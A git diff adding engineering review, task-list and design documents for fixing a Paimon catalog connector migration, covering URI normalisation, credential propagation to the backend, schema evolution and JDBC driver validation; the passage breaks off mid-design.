property keys, so + `enable.mapping.*` is silently inert (MAJOR M-crit). + +These are semantic losses on the BE serialization / auth contract, NOT routes back into old +logic. The legacy baseline for all of (1)/(2)/(4) is +`fe/fe-core/.../paimon/source/PaimonScanNode.java` + `ExternalUtil.initSchemaInfo` + +`PaimonUtil.getHistorySchemaInfo`. + +--- + +## 9. Phase C — Cross-Check vs the Prior Round (post-independent reconciliation) + +> Discipline: this round's findings (§2–§8) were produced independently in a clean room +> BEFORE reading the prior round. This section reconciles them against the prior review +> (`P5-paimon-fullpath-review-2026-06-11.md`, 6 BLOCKER / 8 MAJOR / 11 CONFIRMED) and the **8 +> committed fixes** that landed between the rounds (HEAD `98a73bf7692`). It only classifies; +> it does **not** soften any independent finding. + +The 8 fixes (design docs in `plan-doc/tasks/designs/P5-fix-*`): **FIX-NATIVE-PARTVAL, +FIX-TZ-ALIAS, FIX-REST-VENDED, FIX-STORAGE-CREDS, FIX-HMS-CONFRES, FIX-READ-NOTNULL, +FIX-TABLE-STATS, FIX-CPP-READER**. They collectively targeted all 11 prior CONFIRMED findings. +The two prior **PARTIAL** findings (DV-normalization P7, JDBC driver_url P8.3) were **not** in +the fix set, and the decision/deviation logs record **no** formal deferral of them. + +### 9.1 Fix effectiveness — prior CONFIRMED findings this round re-tested + +| Prior finding (severity) | Fix | This round's result | Status | +|---|---|---|---| +| P1 native DATE/LTZ partition-value raw `toString` (BLOCKER) | FIX-NATIVE-PARTVAL | partition rendering now only a `\N`-vs-`""` MINOR | ✅ fixed | +| P3 `FOR TIME AS OF` fails under CST/PST/EST (MAJOR) | FIX-TZ-ALIAS | Path #3 Time Travel = CLEAN (session-TZ parse byte-faithful) | ✅ fixed | +| P8 REST vended credentials not sent to BE (BLOCKER) | FIX-REST-VENDED | Path #9 vended-cred sub-path = CLEAN (normalized AWS_* overlay) | ✅ fixed | +| P9 s3/oss creds lost from Paimon FileIO (BLOCKER) | FIX-STORAGE-CREDS | catalog-side `applyStorageConfig` now translates canonical→`fs.s3a.*` | ✅ fixed **(catalog seam only — see 9.3)** | +| P9 DLF gate-passes-no-OSS-creds (BLOCKER) | FIX-STORAGE-CREDS | not separately re-surfaced | ✅ likely fixed (catalog seam) | +| P10 read path propagates paimon NOT NULL (MAJOR) | FIX-READ-NOTNULL | not re-found (this round's P10 found uniqueId/isKey/WITH_TIMEZONE only) | ✅ likely fixed | +| supplemental getTableStatistics → row-count -1 (MAJOR) | FIX-TABLE-STATS | critic confirmed `fetchRowCount` a faithful port | ✅ fixed | +| supplemental enable_paimon_cpp_reader serialization (BLOCKER) | FIX-CPP-READER | not re-found | ✅ likely fixed | +| supplemental BINARY/VARBINARY partition render + fix-scope (MAJOR) | FIX-NATIVE-PARTVAL | folded into the now-MINOR partition rendering | ✅ fixed | +| P8 HMS `hive.conf.resources` dropped (MAJOR) | FIX-HMS-CONFRES | **NOT re-verified — critic flagged `hive.config.resources` downflow as a coverage gap** | ⚠️ unverified this round | + +**Net: of the 11 prior CONFIRMED findings, 8 fixes hold for everything this round actually +re-exercised; only HMS-confres was not re-checked.** + +### 9.2 Prior PARTIAL findings — never fixed, this round elevates to BLOCKER + +- **DV + data-file URI normalization** (prior P7, PARTIAL 0/0/3) → this round **B-7DV + B-7DF, + CONFIRMED BLOCKER ×2 (3/3 each)**. The *facts agree across rounds*: both observe the + deletion-file AND the native data-file path are sent un-normalized. The prior round used + "the main file fails first, so the DV-silent-data-loss framing is exaggerated" to rate it + PARTIAL; this round rates it BLOCKER because the read **fails outright** on any + OSS/COS/OBS/s3a warehouse regardless of which file trips first. Severity reframing, not a + factual dispute — and it was never fixed. +- **JDBC `driver_url` security validation** (prior P8.3, PARTIAL 1/0/2 "only under hardened + config") → this round **B-8b, CONFIRMED BLOCKER (3/3)**. Genuine severity divergence: the + prior round discounted it because the default `jdbc_driver_secure_path="*"` means legacy + also loads any jar by default. This round rates it BLOCKER on the arbitrary-jar-in-FE-JVM + + stale "not in SPI_READY_TYPES" disclaimer. **Recommend the user adjudicate severity** — + but note it is paired with a brand-new hard failure (B-8a) on the same flavor. + +### 9.3 The credential story has THREE seams — the prior round + fixes closed two; one remains + +This is the most important reconciliation. Credential downflow has three distinct seams: + +1. **Catalog FileIO `Configuration`/`HiveConf`** (FE metadata + legacy catalog) — prior P9.1/9.2 + found it, **FIX-STORAGE-CREDS fixed it** (canonical `s3.*`/`oss.*` → `fs.s3a.*`/`fs.oss.*`). +2. **Vended (REST) scan-node → BE** — prior P8.1 found it, **FIX-REST-VENDED fixed it** + (vended token normalized to `AWS_*` via `ConnectorContext.vendStorageCredentials`). +3. **Static `s3.*`/`oss.*` scan-node → BE** (`PaimonScanPlanProvider.getScanNodeProperties:347-356`) + — ships raw `location.s3.access_key`; `PluginDrivenScanNode.getLocationProperties:307-320` + only strips the prefix, never normalizes to `AWS_*`; BE native reader wants `AWS_*`. + **This seam (B-9) was missed by BOTH the prior round and the fixes — genuinely new.** + +So FIX-STORAGE-CREDS was correct but scoped to the catalog seam; the static-credential +BE-scan seam is a third, independent gap this round newly identified. + +### 9.4 Genuinely NEW this round (prior round missed or under-rated) + +- **B2 — native schema-evolution (`history_schema_info`/`current_schema_id`) lost → BLOCKER.** + Highest-value divergence. The prior round saw the *adjacent* symptom (P10.2 `uniqueId`=-1) + and rated it **MINOR** with "unreachable from column-mapping code" — it conflated the + `Column.getUniqueId()` channel (truly unconsumed) with the **scan-side `history_schema_info` + channel** (consumed by BE). This round traced the scan→BE path and found BE + `table_schema_change_helper.h` falls back to NAME matching when the params are unset → + renamed/reordered columns read NULL/garbage. FIX-NATIVE-PARTVAL fixed partition *values*, + not schema *evolution* — so this BLOCKER survived both the prior round and the fixes. + *(Note: this round's own repro lens REFUTED the standalone `uniqueId` symptom — agreeing + with the prior round — but the BE `history_schema_info` mechanism is a separate, real path.)* +- **B-8a — JDBC raw unresolved `driver_url` → `MalformedURLException` (BLOCKER).** Prior round + caught only the security facet (P8.3); this round adds the hard functional failure. +- **M-1 — `force_jni_scanner` session var ignored (MAJOR).** Prior round missed. +- **M-8 — filesystem/jdbc Kerberos `doAs` lost (MAJOR).** Prior had only the related + `hdfs.*`-alias MINOR (P9.3); this round elevates the runtime-authenticator loss. +- **M-11 — MTMV / SHOW PARTITIONS / partitions-TVF Kerberos `doAs` lost (MAJOR).** Prior missed. +- **M-crit — dotted-vs-underscore type-mapping flag keys (MAJOR, critic-surfaced, single-pass).** + Prior round's P10 verified the mapping *logic* as parity but never checked the property-KEY + wiring. Not 3-lens-gated this round — lower confidence than the 3/3 findings. + +### 9.5 Severity divergences to adjudicate (facts agree, calibration differs) + +| Item | Prior | This round | Note | +|---|---|---|---| +| COUNT(\*) pushdown | MINOR (1.2) | MAJOR (M-2) | both: correct results, perf-only. Prior's MINOR is the more conventional call; this round elevates on PK-table cost. | +| Native sub-file splitting | MINOR (1.3) | MAJOR (M-3) | both: correct results, parallelism-only. Same calibration gap. | +| field-id `uniqueId` | MINOR (10.2) | MAJOR (M-10) | both agree standalone repro unreachable; this round escalates because impact rides on B2. | + +### 9.6 This round's coverage gaps relative to the prior round + +- HMS `hive.conf.resources` (FIX-HMS-CONFRES) **not re-verified** — this round flagged it as a + coverage gap rather than confirming the fix. +- DLF OSS creds (prior P9.2) not separately re-traced this round. +- A few prior MINORs (HMS socket-timeout P8.4, `hive.metastore.username` alias P8.5) were not + re-listed; prior P9.3 `hdfs.*` defaults partially re-surfaced as this round's path-9 MINOR. + +### 9.7 Reconciled bottom line + +The two rounds **converge** on the clean paths (@incr, time-travel, branch/tag, sys-tables, +metadata-cache, MVCC) and **agree** that the 8 committed fixes resolved the prior round's +confirmed findings this round re-tested. The cutover-dispatch soundness (no live fallback into +legacy) is independently re-confirmed. **NOT commit-ready stands and is strengthened**, gated +by: (a) two prior PARTIALs never fixed, now confirmed BLOCKERs (DV/data-file normalization; +JDBC); (b) a third, newly-found credential seam (static→BE scan, B-9); and (c) a genuinely-new +BLOCKER the prior round under-rated as MINOR (native schema-evolution, B2). No prior CONFIRMED +finding was contradicted by this round. diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md new file mode 100644 index 00000000000000..4af015e50d6218 --- /dev/null +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -0,0 +1,135 @@ +# Task List — P5 paimon **rereview2** fixes (2026-06-11) + +> **Source**: `plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md` (2nd clean-room round; §9 = cross-check vs round 1). +> **Scope**: the confirmed BLOCKER/MAJOR set from round 2 (+ the critic-surfaced MAJOR). MINOR/NIT bundled at the end. +> **Baseline**: HEAD = `98a73bf7692`. Legacy `datasource/paimon/*` still in tree → use it for side-by-side parity on every fix. +> **Per-fix workflow** (project convention + `step-by-step-fix` skill): +> 1. Design doc → `plan-doc/tasks/designs/P5-fix--design.md` (Problem / Root Cause / Design / Impl Plan / Risk / Test Plan). +> 2. **Re-confirm the finding against CURRENT code first** (report is review-only; line numbers may have drifted). +> 3. Implement (minimal, surgical, match style; connector must NOT import fe-core). +> 4. Build + UT (absolute `-f`, read surefire XML + `MVN_EXIT`); add fail-before/pass-after UTs. +> 5. **Independent commit per fix** (see Commit Policy below) → optional `plan-doc/reviews/P5-fix--review-rounds.md`. +> 6. Log SPI changes in `01-spi-extensions-rfc.md`; user-signed decisions in `decisions-log.md`; accepted deviations in `deviations-log.md`. + +## Commit Policy (read before the FIRST commit) +- HEAD is already committed this round (unlike round-1 which held). Independent per-fix commits are expected. +- **HARD precondition before any `git add`**: scrub `regression-test/conf/regression-conf.groovy` (plaintext Aliyun key) + remove scratch (`.audit-scratch/`, `conf.cmy/`, `META-INF/`, `*.bak`). **Path-whitelist `git add` — never `git add -A`.** +- Current branch `catalog-spi-07-paimon` (not `master`) → committing here is fine. +- Each commit message: `fix: ` + root cause + solution + tests. End with the project Co-Authored-By trailer. + +--- + +## Progress (priority-ordered) + +| # | ID | sev | finding | area / file(s) | SPI? | design | impl | build+UT | commit | +|---|----|-----|---------|----------------|------|--------|------|----------|--------| +| 1 | FIX-URI-NORMALIZE | BLOCKER | B-7DV + B-7DF | native data-file + DV path scheme norm (oss/cos/obs/s3a→s3) | **yes** | ✅ | ✅ | ✅ | 🔄 | +| 2 | FIX-STATIC-CREDS-BE | BLOCKER | B-9 | static s3/oss/cos/obs creds → BE as canonical `AWS_*` | **yes** | ⬜ | ⬜ | ⬜ | ⬜ | +| 3 | FIX-SCHEMA-EVOLUTION | BLOCKER | B-1a (+M-10) | emit `current_schema_id`/`history_schema_info` + field-id thru SPI | **yes** | ⬜ | ⬜ | ⬜ | ⬜ | +| 4 | FIX-JDBC-DRIVER-URL | BLOCKER | B-8a + B-8b | resolve+alias `jdbc.driver_url` for BE; enforce security allow-list | maybe | ⬜ | ⬜ | ⬜ | ⬜ | +| 5 | FIX-MAPPING-FLAG-KEYS | MAJOR | M-crit | dotted-vs-underscore type-mapping flag keys (wrong type) | no | ⬜ | ⬜ | ⬜ | ⬜ | +| 6 | FIX-KERBEROS-DOAS | MAJOR | M-8 + M-11 | UGI `doAs` on fs/jdbc ops + partition-listing read path | maybe | ⬜ | ⬜ | ⬜ | ⬜ | +| 7 | FIX-FORCE-JNI-SCANNER | MAJOR | M-1 | honor `force_jni_scanner` session var on connector scan | no | ⬜ | ⬜ | ⬜ | ⬜ | +| 8 | FIX-COUNT-PUSHDOWN | MAJOR* | M-2 | FE-computed `mergedRowCount` / `paimon.row_count` (perf) | maybe | ⬜ | ⬜ | ⬜ | ⬜ | +| 9 | FIX-NATIVE-SUBSPLIT | MAJOR* | M-3 | native ORC/Parquet sub-file splitting (parallelism) | maybe | ⬜ | ⬜ | ⬜ | ⬜ | + +`sev*` = round-2 rated MAJOR but round-1 rated **MINOR** (perf-only, correct results) — **user decides severity** (see §P2). +Legend: ⬜ todo / 🔄 in progress / ✅ done + +> **Ordering rationale**: P0 (#1–4) all gate commit. #1+#2 first = broadest blast radius (they break *all* native reads on OSS/COS/OBS/private-S3 — basic cloud usage) and share the same BE-bound scan-property-normalization seam (reuse the `FIX-REST-VENDED` `ConnectorContext` pattern). #3 (B2) is the most *dangerous* failure mode (silent wrong rows) but has a narrower trigger (schema-evolved + native + rename) and a larger SPI surface; **if you weight silent-corruption highest, do #3 first — it is independent of #1/#2.** #4 (JDBC) is isolated to one flavor. + +--- + +## P0 — BLOCKER (commit-gating) + +### 1. FIX-URI-NORMALIZE — native data-file + DV paths sent to BE un-normalized +- **Findings**: B-7DF (data file), B-7DV (deletion vector). Failure: native ORC/Parquet + DV reads **fail outright** on `oss://`/`cos://`/`obs://`/`s3a://` warehouses (BE S3 factory only recognizes `s3://`). Pure `s3://`/`hdfs://` unaffected. +- **Connector**: `PaimonScanPlanProvider.java:269-276` (`.path(file.path())` raw), `:281-283` (`builder.deletionFile(df.path(),…)` raw); `PaimonScanRange.java:190-200`. +- **fe-core**: `PluginDrivenSplit.java:65-68` (single-arg, NON-normalizing `LocationPath.of`); `PluginDrivenScanNode`. +- **Legacy parity**: `source/PaimonScanNode.java:295-298` (DV) and `:443` (data file) — both use the **2-arg** `LocationPath.of(path, storagePropertiesMap).toStorageLocation()`. +- **Fix sketch**: connector can't import `LocationPath` → normalize in the fe-core bridge (`PluginDrivenSplit.buildPath` + the DV desc build in `PluginDrivenScanNode`/`PaimonScanRange`) using the storage-properties map, **or** add a `ConnectorContext` path-normalization SPI hook (mirror the `FIX-REST-VENDED` seam). Apply to **both** the data-file path and the DV path. +- **Test**: connector/bridge UT asserting an `oss://` input → `s3://` BE-bound path for both data + DV; live-e2e (OSS warehouse + DV) is CI-gated. + +### 2. FIX-STATIC-CREDS-BE — static object-store creds reach BE as RAW keys +- **Finding**: B-9. Static `s3.*`/`oss.*`/`cos.*`/`obs.*` catalog creds are copied verbatim under `location.`; BE native reader wants `AWS_ACCESS_KEY`/`AWS_SECRET_KEY`/… → no usable creds → 403 on private buckets. (FIX-REST-VENDED fixed the *vended* seam; FIX-STORAGE-CREDS fixed the *catalog FileIO* seam — this is the **third, static→BE-scan seam**, see review §9.3.) +- **Connector**: `PaimonScanPlanProvider.java:347-356` (`getScanNodeProperties`, raw copy under `location.*`). +- **fe-core**: `PluginDrivenScanNode.java:307-320` (`getLocationProperties` only strips the `location.` prefix — no normalization). +- **Legacy parity**: `source/PaimonScanNode.java:176,650-652`; `AbstractS3CompatibleProperties.java:105-122` (canonical alias → `AWS_*`); BE `s3_util.cpp:146-150`. +- **Fix sketch**: normalize static aliases to BE `AWS_*` before they leave FE — reuse / extend the `ConnectorContext.vendStorageCredentials` normalization tail for static keys, or normalize in the bridge. Also covers the bare `AWS_*`/`access_key` (no `s3.` prefix) case currently dropped entirely. +- **Test**: UT mutating the connector test that currently codifies the raw key (`PaimonScanPlanProviderTest.java:535`) → assert BE-bound `AWS_ACCESS_KEY` present; live-e2e CI-gated (private S3/OSS). + +### 3. FIX-SCHEMA-EVOLUTION — native reader loses paimon schema-evolution (+ field-id) +- **Findings**: B-1a (BLOCKER, silent wrong/NULL rows on column rename/reorder via native reader) + M-10 (MAJOR, `Column.uniqueId` left -1 — its root cause; standalone repro refuted but it feeds B-1a's BE contract). +- **Connector**: `PaimonScanRange.java:181-184` (only sets per-file `schema_id`); `PaimonScanPlanProvider.java:276`; `PaimonConnectorMetadata.java:1007-1012` (5-arg `ConnectorColumn`, no field-id); `ConnectorColumnConverter.java:65-70` (→ `uniqueId=-1`). +- **fe-core**: `PluginDrivenScanNode` never calls `ExternalUtil.initSchemaInfo` / sets `current_schema_id` / `history_schema_info`. +- **Legacy parity**: `source/PaimonScanNode.java:169` (`initSchemaInfo(-1L)`), `:285` (`putHistorySchemaInfo` per native split); `ExternalUtil.java:86-92`; `PaimonUtil.getHistorySchemaInfo`; `PaimonExternalTable.java:349-355` + `PaimonUtil.java:318-347` (recursive `updatePaimonColumnUniqueId`, incl. nested ARRAY/MAP/ROW). +- **BE contract (frozen)**: `be/src/format/table/table_schema_change_helper.h:219-236` falls back to `by_parquet_name`/`by_orc_name` when `history_schema_info` is unset; field-id path is `:241-267`. +- **Fix sketch**: (a) thread paimon `DataField.id()` through SPI `ConnectorColumn` (+ nested) → `Column.setUniqueId`; (b) emit `current_schema_id` + per-split `history_schema_info` on the native path via the bridge (`PluginDrivenScanNode` → `ExternalUtil.initSchemaInfo` + per-split schema). Largest SPI surface of the P0 set. +- **Test**: UT asserting the native split params carry `current_schema_id` + history schema; e2e = `test_paimon_full_schema_change.groovy` (rename over ORC/Parquet) CI-gated. + +### 4. FIX-JDBC-DRIVER-URL — JDBC flavor driver_url unresolved + unvalidated +- **Findings**: B-8a (raw unresolved `jdbc.driver_url` + dropped `paimon.jdbc.*` alias → `MalformedURLException`) + B-8b (security allow-list / format / secure-path not enforced → arbitrary remote jar in FE JVM; stale "not in SPI_READY_TYPES" disclaimer). +- **Connector**: `PaimonScanPlanProvider.java:549-565` (forwards `jdbc.*` verbatim); `PaimonConnector.java:232-247,206-216,249-287` (`resolveFullDriverUrl` — no validation); `:230` (stale disclaimer). +- **Legacy parity**: `PaimonJdbcMetaStoreProperties.java:164-176` (emits `jdbc.driver_url=getFullDriverUrl(resolved)`), `:190`; `JdbcResource.java:300-329` (format + `checkCloudWhiteList` + `jdbc_driver_secure_path`). +- **Fix sketch**: resolve `driver_url` via `getFullDriverUrl` on the BE-options path + honor the `paimon.jdbc.*` alias (B-8a); enforce the FE security allow-list/format/secure-path — the wired hook is `ConnectorValidationContext.validateAndResolveDriverPath` (jdbc/trino override `preCreateValidation`); paimon must override it (B-8b). Remove the stale disclaimer. +- **Severity note (cross-check)**: round-1 rated the *security* facet PARTIAL ("default `jdbc_driver_secure_path="*"` → legacy also loads any jar"). B-8a (functional `MalformedURLException`) is unambiguous; for B-8b confirm whether to treat as BLOCKER or hardened-config-only — **fold both into one fix regardless.** + +--- + +## P1 — MAJOR (fix or explicitly accept) + +### 5. FIX-MAPPING-FLAG-KEYS — type-mapping flags silently dead (wrong column types) +- **Finding**: M-crit (critic-surfaced; **not 3-lens-gated → re-verify first**). Connector reads underscore keys `enable_mapping_binary_as_varbinary` / `enable_mapping_timestamp_tz`; FE/legacy set DOTTED keys `enable.mapping.varbinary` / `enable.mapping.timestamp_tz` → flags stuck false → BINARY→STRING and LTZ→DATETIMEV2 even when the user enabled the mapping. +- **Connector**: `PaimonConnectorProperties.java:39,42`; read `PaimonConnectorMetadata.java:1017-1027`; consumed `PaimonTypeMapping.java:130-165`. **Legacy**: `CatalogProperty.java:50,52`; `ExternalCatalog.setDefaultPropsIfMissing:302-306`; `PaimonUtil.paimonPrimitiveTypeToDorisType:253,257,283-286`. +- **Fix sketch**: read the dotted keys the FE actually sets (and reconcile the renamed `varbinary` key), or normalize dots→underscores in `PluginDrivenExternalCatalog.createConnectorFromProperties` before constructing the connector. Pure connector/FE-wiring; no BE. +- **Test**: UT constructing the connector with `{"enable.mapping.timestamp_tz":"true"}` → assert LTZ column maps to TIMESTAMPTZ (closes critic coverage-gap #2). + +### 6. FIX-KERBEROS-DOAS — UGI doAs lost on fs/jdbc ops + partition listing +- **Findings**: M-8 (filesystem/jdbc over Kerberized HDFS lose `doAs` — `initializeCatalog` dead on cutover path; HMS unaffected) + M-11 (MTMV / SHOW PARTITIONS / partitions-TVF partition listing runs the `listPartitions` RPC without `doAs` on Kerberos HMS). Grouped: same authenticator mechanism. +- **Connector**: `PaimonConnector.java:124-196` (M-8); `PaimonCatalogOps.java:249-251`, `PaimonConnectorMetadata.java:892-894` (M-11). **fe-core**: `PluginDrivenExternalCatalog.java:122-137,150`; `PluginDrivenMvccExternalTable.java:157`; `PluginDrivenExternalTable.java:317-318`. +- **Legacy parity**: `PaimonFileSystemMetaStoreProperties.java:40-57`, `PaimonJdbcMetaStoreProperties.java:111-135` (M-8); `PaimonExternalCatalog.java:96-118` (`executionAuthenticator.execute` wrap), `metacache/paimon/PaimonPartitionInfoLoader.java:49` (M-11). +- **Fix sketch**: wire the fs/jdbc HDFS authenticator on the live (connector) create path; wrap the partition-listing read RPC in `executeAuthenticated` (note round-1 D7=B deliberately left read-vs-DDL asymmetric — confirm whether to wrap reads too). Scope = secured HMS/HDFS deployments. **Verify the M-8 "DLF" clause** (review says it's overstated; DLF inherits the no-op authenticator). + +### 7. FIX-FORCE-JNI-SCANNER — `force_jni_scanner` session var ignored +- **Finding**: M-1. Connector reads only `paimonHandle.isForceJni()` (binlog/audit flag), never the session `force_jni_scanner`; native always chosen for ORC/Parquet. The JNI escape hatch (used to dodge native-reader bugs — incl. the B2 schema-evolution one) is gone. +- **Connector**: `PaimonScanPlanProvider.java:261,439-441` (`shouldUseNativeReader`). **Legacy**: `source/PaimonScanNode.java:361,430` (`sessionVariable.isForceJniScanner()` gate). +- **Fix sketch**: read `force_jni_scanner` from the session-properties map (the var is already in it — connector reads sibling `enable_paimon_cpp_reader` from there) and route all data splits to JNI when set. Pure connector. + +--- + +## P2 — Severity-disputed MAJOR (perf-parity; round-1 = MINOR) — **user decides scope** + +> Both are correct-results, perf/parallelism-only. Recommend **accept-or-defer** unless perf parity is required for cutover. If deferring, log in `deviations-log.md`. + +### 8. FIX-COUNT-PUSHDOWN — `COUNT(*)` pushdown not implemented (M-2) +- Connector never computes `mergedRowCount` / emits `paimon.row_count` → BE materializes merged rows to count (esp. costly on PK tables). `PaimonScanPlanProvider.java:186-296` vs `source/PaimonScanNode.java:396,421-429,483-495`. + +### 9. FIX-NATIVE-SUBSPLIT — native sub-file splitting lost (M-3) +- One split per RawFile; large ORC/Parquet files get a single scanner. `PaimonScanPlanProvider.java:263-286` vs `source/PaimonScanNode.java:434-465` (`determineTargetFileSplitSize` + `fileSplitter.splitFile`). See also critic coverage-gap on split-count accounting (P3). + +--- + +## P3 — Coverage gaps to verify/close (completeness critic; NOT confirmed bugs) + +> These are "go check", not fixes. Convert to a FIX-task only if a real divergence is found. + +- **VERIFY FIX-HMS-CONFRES**: round-2 did **not** re-test `hive.config.resources` / hive-site.xml downflow into BE-facing scan props (the round-1 MAJOR's fix). Confirm it reaches `getScanNodeProperties` for HMS/DLF. +- **TRACE DDL write parity**: `PaimonConnectorMetadata.createTable/dropTable/createDatabase/dropDatabase` (`:683-797`) vs legacy `PaimonMetadataOps`; branch/tag DDL write (`ExternalCatalog.java:1427-1513`); IF-(NOT-)EXISTS short-circuit, editlog/cache-refresh ordering, error-code parity. +- **TRACE ANALYZE / column-stats**: `ExternalAnalysisTask` / `getColumnStatistic` parity (fetchRowCount itself already confirmed faithful). +- **CHECK split-count accounting** under lost splitting (`SqlBlockRuleMgr` limits, batch-mode) — ties to #9. + +--- + +## P4 — MINOR / NIT (low-priority cleanup; full list in review §5) + +Bundle as one optional cleanup pass after P0–P1. Most are display-only (DESC `Key`/`Extra`/`uniqueId`, VARCHAR(65533)→STRING, EXPLAIN delete-split accounting, error-message text), perf/architectural (cache granularity), or benign. **The one with a real (rare) data edge**, worth a deliberate decision: +- Partition null-sentinel coercion: a STRING partition whose literal value is `__HIVE_DEFAULT_PARTITION__` or `\N` is coerced to NULL (connector) vs read as the literal (legacy). `PaimonScanRange.java:212-225` / `ConnectorPartitionValues.java:32-54` vs `source/PaimonScanNode.java:323-326`. + +--- + +## Notes / gates (reuse) +- maven: absolute `-f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl : -am -Dmaven.build.cache.enabled=false -DfailIfNoTests=false`; verify via surefire XML + `MVN_EXIT`. `-pl :fe-connector-paimon -am` does **not** rebuild fe-core; fe-core changes need `-pl :fe-core -am`. +- Connector import gate: `bash tools/check-connector-imports.sh` (must stay clean — drives the "SPI?" column: B1/B3/B2 need fe-core-side or new `ConnectorContext` SPI seams because the connector can't import `LocationPath`/`StorageProperties`). +- cwd persists across Bash calls; `cd` breaks relative paths → always absolute. +- Tests: prefer runnable FE **unit tests** (connector harness: `FakePaimonTable` / `RecordingPaimonCatalogOps` / `RecordingConnectorContext` / `PaimonScanPlanProviderTest`). Live-e2e (S3/OSS/REST/JDBC/Kerberos) is CI-gated — note it as gated, don't claim it ran. +- Re-confirm each finding against current code before editing (review is read-only; lines may have drifted). diff --git a/plan-doc/tasks/designs/P5-fix-URI-NORMALIZE-design.md b/plan-doc/tasks/designs/P5-fix-URI-NORMALIZE-design.md new file mode 100644 index 00000000000000..7feacc8eb9fd8d --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-URI-NORMALIZE-design.md @@ -0,0 +1,111 @@ +# P5-fix-FIX-URI-NORMALIZE — design + +> Task #1 (BLOCKER) of `plan-doc/task-list-P5-rereview2-fixes.md`. Findings **B-7DF** (data-file path) + **B-7DV** (deletion-vector path) from `plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md`. +> Re-confirmed against current code (HEAD `98a73bf7692`) + 4-area recon workflow + adversarial synthesis (2026-06-11). Line numbers below are CURRENT. + +## Problem + +The paimon connector sends native ORC/Parquet **data-file** paths and **deletion-vector (DV)** paths to BE **without URI scheme normalization**. The paimon SDK emits paths in the warehouse's native scheme (`oss://`, `cos://`, `obs://`, `s3a://`, or the OSS `bucket.endpoint` authority form). BE's file factory is **scheme-dispatched** and its S3 reader only recognizes canonical `s3://`. Result on any S3-compatible (non-AWS) warehouse: + +- **B-7DF (data-file)**: native ORC/Parquet read **fails outright** — `S3URI::parse` rejects `oss://…`. +- **B-7DV (deletion-vector)**: BE cannot open the DV index → **deleted rows silently reappear** (merge-on-read corruption — the more dangerous failure: wrong rows, not a hard error). + +Pure `s3://` / `hdfs://` warehouses are unaffected (their scheme is already canonical). JNI read path is unaffected (the serialized paimon `Table` carries its own `FileIO`). + +## Root Cause + +Legacy `PaimonScanNode` normalizes **both** paths through the **2-arg normalizing** factory `LocationPath.of(path, storagePropertiesMap)` → `StorageProperties.validateAndNormalizeUri()` (e.g. `OSSProperties.validateAndNormalizeUri` rewrites `oss://bucket.endpoint/p` → `oss://bucket/p`, then the S3-compatible base rewrites scheme → `s3://`): +- data-file: `datasource/paimon/source/PaimonScanNode.java:443` +- DV: `…/PaimonScanNode.java:296-297` (`…toStorageLocation().toString()`) + +The cutover dropped this. The two paths now reach BE raw via **two structurally different mechanisms**: + +1. **Data-file path** (3-hop chain, all raw): + - `PaimonScanPlanProvider.java:270` — `.path(file.path())` stores the raw paimon-SDK path into `PaimonScanRange`. + - `PluginDrivenSplit.java:65-68` — `buildPath()` calls the **single-arg** `LocationPath.of(pathStr)` (`LocationPath.java:163-169`), which sets `normalizedLocation = location` verbatim, `storageProperties = null` — **no normalization**. + - `FileQueryScanNode.java:568` — `rangeDesc.setPath(fileSplit.getPath().toStorageLocation().toString())`; `toStorageLocation()` (`LocationPath.java:404`) wraps the raw `normalizedLocation`. **This is the only writer of the data-file path to BE thrift.** + +2. **DV path** (connector-baked into thrift): + - `PaimonScanPlanProvider.java:282` — `builder.deletionFile(df.path(), …)` stores the raw DV path. + - `PaimonScanRange.java:194` — `deletionFile.setPath(deletionPath)` writes it straight into `TPaimonDeletionFileDesc`, **inside the connector's `populateRangeParams`**, which fe-core invokes opaquely (`PluginDrivenScanNode.java:762`). **fe-core never sees the DV path as a separable value.** + +The connector **cannot** import fe-core's `LocationPath` / `StorageProperties` (SPI boundary, enforced by `tools/check-connector-imports.sh`). + +## Design + +**A new `ConnectorContext` SPI normalization hook, called by the connector at both raw sites.** This is the only seam that fixes **both** paths with one uniform mechanism. A fe-core-bridge-only fix (normalize in `PluginDrivenSplit.buildPath`) is **impossible for the DV path** — the connector bakes it into thrift before fe-core can intercept it. Mixing two mechanisms (bridge for data-file, SPI for DV) would be inconsistent; the SPI hook covers both and keeps format-specific thrift construction in the connector (the established design, `PluginDrivenScanNode.java:761`). This mirrors the existing `ConnectorContext.vendStorageCredentials` credential seam (the task-list's recommended pattern) exactly. + +### SPI (`fe-connector-spi/ConnectorContext.java`) — new default no-op method +```java +/** Normalizes a raw storage URI a connector emits (e.g. paimon native data-file / DV path like + * oss://…, cos://…, s3a://…) to BE's canonical form (s3://…) using the catalog's storage + * properties. BE's scheme-dispatched file factory only recognizes the canonical scheme; a + * connector emitting native file paths MUST route them through this hook. The connector cannot do + * this itself (must not import fe-core LocationPath/StorageProperties). Default = identity, so + * every other connector and any already-canonical path is unaffected. Fail-loud on error. */ +default String normalizeStorageUri(String rawUri) { return rawUri; } +``` + +### fe-core impl (`DefaultConnectorContext.java`) — real normalization +```java +@Override +public String normalizeStorageUri(String rawUri) { + if (Strings.isNullOrEmpty(rawUri)) { + return rawUri; + } + // Mirror legacy PaimonScanNode's 2-arg LocationPath.of(path, storagePropertiesMap): + // scheme-normalize (oss/cos/obs/s3a -> s3, bucket.endpoint -> bucket) so BE's S3 factory + // can open the file. Fail-loud (StoragePropertiesException propagates) — a path that cannot + // be normalized would otherwise silently corrupt reads (esp. DV merge-on-read). + return LocationPath.of(rawUri, storagePropertiesSupplier.get()).toStorageLocation().toString(); +} +``` +`DefaultConnectorContext` gains a `Supplier> storagePropertiesSupplier` (lazy — invoked at scan time, catalog fully initialized). New 4-arg ctor; the existing 2-arg/3-arg ctors delegate with a `Collections::emptyMap` supplier (identity-preserving for non-plugin catalogs — `LocationPath.of(x, {})` would throw, but those ctors are never used by paimon and the method is only called by paimon). + +### catalog wiring (`PluginDrivenExternalCatalog.java:150`) +```java +new DefaultConnectorContext(name, id, this::getExecutionAuthenticator, + () -> catalogProperty.getStoragePropertiesMap()) +``` + +### connector call sites (`PaimonScanPlanProvider.java`, native-reader branch only) +- `:270` → `.path(normalizeUri(file.path()))` +- `:282` → `builder.deletionFile(normalizeUri(df.path()), df.offset(), df.length())` +- private helper `normalizeUri(String raw)` = `context != null ? context.normalizeStorageUri(raw) : raw` (null-guard 